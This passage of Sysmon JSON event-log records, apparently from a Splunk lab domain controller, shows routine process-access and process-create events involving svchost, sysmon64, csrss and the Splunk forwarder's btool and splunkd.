05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3337,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3338,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-001088360500}\r\nTargetProcessId: 4536\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-001088360500}","TargetProcessId":"4536","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3339,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.741\r\nProcessGuid: {A837DB8D-023A-5F25-0000-001040370500}\r\nProcessId: 4564\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-023A-5F25-0000-001088360500}\r\nParentProcessId: 4536\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.741","ProcessGuid":"{A837DB8D-023A-5F25-0000-001040370500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-023A-5F25-0000-001088360500}","ParentProcessId":"4536","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3340,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-023A-5F25-0000-001088360500}\r\nSourceProcessId: 4536\r\nSourceThreadId: 4624\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-001040370500}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-023A-5F25-0000-001088360500}","SourceProcessId":"4536","SourceThreadId":"4624","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-001040370500}","TargetProcessId":"4564","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3341,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-023A-5F25-0000-001040370500}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-023A-5F25-0000-001040370500}","TargetProcessId":"4564","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3342,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3343,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3344,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:42.731","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3345,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:42.731\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 